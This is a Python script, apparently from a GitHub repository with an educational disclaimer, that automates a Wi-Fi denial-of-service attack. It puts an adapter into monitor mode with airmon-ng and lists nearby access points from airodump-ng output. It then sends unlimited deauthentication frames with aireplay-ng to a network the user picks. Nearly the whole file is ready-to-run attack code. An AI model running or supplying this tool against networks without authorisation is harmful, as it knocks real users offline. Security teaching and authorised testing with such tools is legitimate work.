-
Notifications
You must be signed in to change notification settings - Fork 1.6k
/
Copy pathwifi_dos_type1.py
251 lines (208 loc) · 11.4 KB
/
wifi_dos_type1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
#!/usr/bin/env python3
# Disclaimer: This script is for educational purposes only. Do not use against any network that you don't own or have authorization to test.
# We will be using the subprocess module to run commands on Kali Linux.
import subprocess
# We require regular expressions.
import re
# We want to open the CSV files generated by airmon-ng,
# and we'll use the built-in csv module.
import csv
# We want to import os because we want to check for sudo
import os
# We want to use time.sleep()
import time
# We want to move .csv files in the folder if we found any.
# We'll use shutil for that.
import shutil
# Create a timestamp for .csv filename
from datetime import datetime
# Create an empty list
active_wireless_networks = []
# We use this function to test if the ESSID is already in the list file.
# If so we return False so we don't add it again.
# If it is not in the lst we return True which will instruct the elif
# statement to add it to the lst.
def get_monitor_interface(managed_iface):
"""
Finds the corresponding monitor mode interface for a given managed interface.
The monitor interface can be wlanXmon, monX, or even remain as wlanX.
Args:
managed_iface (str): The name of the managed interface (e.g., wlan0, wlan1, wlan2).
Returns:
str or None: The matching monitor mode interface (e.g., wlan0mon, mon0, wlan0) or None if not found.
"""
# Extract the number from the managed interface (e.g., wlan0 → 0, wlan2 → 2)
match = re.search(r"(\d+)$", managed_iface)
if not match:
print(f"Error: Could not extract number from {managed_iface}")
return None
iface_number = match.group() # Extracted number as a string
# Run 'iw dev' to get the list of interfaces and their modes
iw_result = subprocess.run(["iw", "dev"], capture_output=True, text=True).stdout
# Look for interfaces in monitor mode
monitor_interfaces = {}
iface_name = None
monitor_mode = False
for line in iw_result.split("\n"):
line = line.strip()
if line.startswith("Interface "):
iface_name = line.split()[1] # Get the interface name
monitor_mode = False # Reset monitor mode flag for the new interface
if "type monitor" in line and iface_name:
monitor_interfaces[iface_name] = True # Store as monitor mode
# Match a monitor mode interface with the same number
for iface in monitor_interfaces.keys():
if re.search(rf"{iface_number}(mon)?$", iface): # Match wlan0mon, mon0, or wlan0
return iface
return None # No matching monitor mode interface found
def check_for_essid(essid, lst):
check_status = True
# If no ESSIDs in list add the row
if len(lst) == 0:
return check_status
# This will only run if there are wireless access points in the list.
for item in lst:
# If True don't add to list. False will add it to list
if essid in item["ESSID"]:
check_status = False
return check_status
# Basic user interface header
print(r"""______ _ _ ______ _ _
| _ \ (_) | | | ___ \ | | | |
| | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
| | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
| |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
|___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
print("\n****************************************************************")
print("\n* Copyright of David Bombal, 2021 *")
print("\n* https://www.davidbombal.com *")
print("\n* https://www.youtube.com/davidbombal *")
print("\n****************************************************************")
# If the user doesn't run the program with super user privileges, don't allow them to continue.
if not 'SUDO_UID' in os.environ.keys():
print("Try running this program with sudo.")
exit()
# Remove .csv files before running the script.
for file_name in os.listdir():
# We should only have one csv file as we delete them from the folder
# every time we run the program.
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory and will move them to the backup directory.")
# We get the current working directory.
directory = os.getcwd()
try:
# We make a new directory called /backup
os.mkdir(directory + "/backup/")
except:
print("Backup folder exists.")
# Create a timestamp
timestamp = datetime.now()
# We move any .csv files in the folder to the backup folder.
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
# Regex to find wireless interfaces. We're making the assumption they will all be wlan0 or higher.
wlan_pattern = re.compile("^wlan[0-9]+")
# Python allows is to run system commands by using a function provided by the subprocess module.
# subprocess.run(<list of command line arguments goes here>)
# The script is the parent process and creates a child process which runs the system command,
# and will only continue once the child process has completed.
# We run the iwconfig command to look for wireless interfaces.
check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode())
# No WiFi Adapter connected.
if len(check_wifi_result) == 0:
print("Please connect a WiFi adapter and try again.")
exit()
# Menu to select WiFi interface from
print("The following WiFi interfaces are available:")
for index, item in enumerate(check_wifi_result):
print(f"{index} - {item}")
# Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from.
while True:
wifi_interface_choice = input("Please select the interface you want to use for the attack: ")
try:
if check_wifi_result[int(wifi_interface_choice)]:
break
except:
print("Please enter a number that corresponds with the choices available.")
# For easy reference we call the selected interface hacknic
hacknic = check_wifi_result[int(wifi_interface_choice)]
# Tell the user we're going to kill the conflicting processes.
print("WiFi adapter connected!\nNow let's kill conflicting processes:")
# subprocess.run(<list of command line arguments goes here>)
# The script is the parent process and creates a child process which runs the system command,
# and will only continue once the child process has completed.
# We run the iwconfig command to look for wireless interfaces.
# Killing all conflicting processes using airmon-ng
kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"])
# Put wireless in Monitor mode
print("Putting Wifi adapter into monitored mode:")
put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic])
# subprocess.Popen(<list of command line arguments goes here>)
# The Popen method opens a pipe from a command.
# The output is an open file that can be accessed by other programs.
# We run the iwconfig command to look for wireless interfaces.
# Discover access points
# Get the actual monitor mode name for the selected interface
hacknic = get_monitor_interface(hacknic)
if not hacknic:
print("No monitor mode interface found, exiting...")
exit()
discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", hacknic], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
# Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c.
try:
while True:
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
# This will run multiple times and we need to reset the cursor to the beginning of the file.
csv_h.seek(0)
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for row in csv_reader:
# We want to exclude the row with BSSID.
if row["BSSID"] == "BSSID":
pass
# We are not interested in the client data.
elif row["BSSID"] == "Station MAC":
break
# Every field where an ESSID is specified will be added to the list.
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
print("No |\tBSSID |\tChannel|\tESSID |")
print("___|\t___________________|\t_______|\t______________________________|")
for index, item in enumerate(active_wireless_networks):
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
# We make the script sleep for 1 second before loading the updated list.
time.sleep(1)
except KeyboardInterrupt:
print("\nReady to make choice.")
# Ensure that the input choice is valid.
while True:
# If you don't make a choice from the options available in the list,
# you will be asked to please try again.
choice = input("Please select a choice from above: ")
try:
if active_wireless_networks[int(choice)]:
break
except:
print("Please try again.")
# To make it easier to work with and read the code, we assign the results to variables.
hackbssid = active_wireless_networks[int(choice)]["BSSID"]
hackchannel = active_wireless_networks[int(choice)]["channel"].strip()
# Change to the channel we want to perform the DOS attack on.
# Monitoring takes place on a different channel and we need to set it to that channel.
subprocess.run(["airmon-ng", "start", hacknic, hackchannel])
# Deauthenticate clients using a subprocess.
# The script is the parent process and creates a child process which runs the system command,
# and will only continue once the child process has completed.
subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)]])
# User will need to use control-c to break the script.